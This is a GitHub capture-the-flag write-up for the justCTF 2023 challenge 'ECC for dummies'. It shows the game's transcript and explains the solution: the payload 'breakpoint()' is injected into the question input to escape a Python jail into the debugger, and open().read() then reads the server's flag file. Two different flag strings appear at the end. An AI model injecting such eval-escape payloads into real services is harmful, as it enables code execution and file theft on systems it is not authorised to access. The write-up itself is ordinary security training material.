

Files

main

Go to file

> .github

> 2023

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ctf-writeup / 2023 / justCTF 2023 / ECC for dummies /

daffainfo

 feat: grouped the challs

e6c48e5 · last month

History

README.md

ECC for dummies

ECC for dummies

Sometimes you have to force logic to do what you want it to do

About the Challenge

We were given a server to connect and also the source code. So we can input 8 questions and we need to guess the cards too (You can download the source code [here](#))

```
Hello there!
Would you like to play a little game?
I have written 5 values (yes, no) on cards. I am curious if you are able to guess which values they are.
You can ask me 8 logic questions.
I know you're smart, so I won't always be honest about the answers. No worries, I will fool you only 3 times.
0.Question: test
Question resolves to: True
1.Question: test
Question resolves to: True
2.Question: test
Question resolves to: False
3.Question: test
Question resolves to: True
4.Question: test
Question resolves to: True
5.Question: test
Question resolves to: True
6.Question: test
Question resolves to: False
7.Question: test
Question resolves to: True
You have used all the questions.
Now tell me one by one what I have written down on the cards.
Your response: test
Your answer did not include all the cards
```

How to Solve?

To solve this chall, im using PyJail payload and I inputted it when the bot asked us to input the question

```
breakpoint()
```

After entering Python debugger, run this command to obtain the flag

```
open("/jailed/flag.txt").read()
```

```
> <string>(1)<module>()->None
(Pdb) open("/jailed/flag.txt")
<_io.TextIOWrapper name='/jailed/flag.txt' mode='r' encoding='utf-8'>
(Pdb) open("/jailed/flag.txt").read()
'justCTF{S0me7ime$_L0Gic_1s_n0T_B1n4ry_0101}'
(Pdb)
```

```
justCTF{S4nd_S0metim3s_It$_EvEn_$0lv4ble}
```